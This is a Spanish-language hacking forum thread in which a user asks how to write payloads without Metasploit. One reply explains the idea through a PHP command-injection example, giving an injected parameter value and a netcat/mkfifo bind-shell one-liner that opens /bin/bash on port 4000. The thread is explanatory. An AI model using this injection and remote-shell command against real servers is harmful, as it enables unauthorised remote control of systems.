crear mi propio payload sin utilizar metasploit en linux?

Iniciado por kripton, 13 Julio 2019, 23:17 PM

0 Miembros y 1 Visitante están viendo este tema.

kripton

como puedo crear mis propios payloads sin utilizar metasploit?

animanegra

Para que exploit, sistema y arquitectura? Es un re en un sistema web con PHP??

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

kripton

bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework

@XSStringManolo

Los exploits se crean para vulnerar algo.
Sin que no digas que es ese algo no podemos decirte como explotar una vulnerabilidad.
Mira el primer post titulado Libros Para Principiantes en el foro de dudas generales. Ahí tienes libros para aprender.

animanegra

Cita de: kripton en 17 Julio 2019, 22:02 PM
bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework

Un payload es la ejecución de cualquier cosa. Puedes desde querer ejecutar la calculadora hasta ejecutar un sistema de control remoto.

Dependiendo de en donde ,exploit, vas a ejecutar dicho exploit tienes determinadas restricciones. El payload puede ser en algunos casos ejecución de determinados comandos, o una funcion compilada en binario para ejecutar en un buffer.

Por ejemplo, en un php que tenga en algun parte del código algo como esto:


system("convert ".$GET['nombrefichero']." ".random().".jpg");


Se podría meter en la variable GET nombre de fichero el valor:


"abc abc.jpg; PAYLOAD; convert abc "


onde PAYLOAD puede ser cualquier comando, en un entorno linux con nc por ejemplo si payload vale esto:


mkfifo /tmp/dummy; nc -l -p 4000 < /tmp/dummy | /bin/bash > /tmp/dummy;


consigues una ejecucion de un entorno de comandos remoto en el servidor cuando te conectas al puerto 4000.

Pero por ejemplo ese payload concreto no se puede utilizar en un entonrno con un servidor con buffer overflow que permite ejecucion de comandos en pila, poque necesitas la generación de un payload que esté codificado en binario en forma de funcion para que cuando cambies la direccion de salto, saltes al payload y se ejecute la funcion que deseas. Que podría ser perfectamente un execvp de lo que he descrito arriba, pero necesitas envolverlo de más cosas para que séa funcional.

¿Se entiende? Por lo que ¿A que te refieres con hacer tu propio Payload? Porque los payloads al finál se pueden codificar en bash, visualbasic, python, SQL, codigo ensamblador.... dependiendo a que exploit van asociados.

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

kripton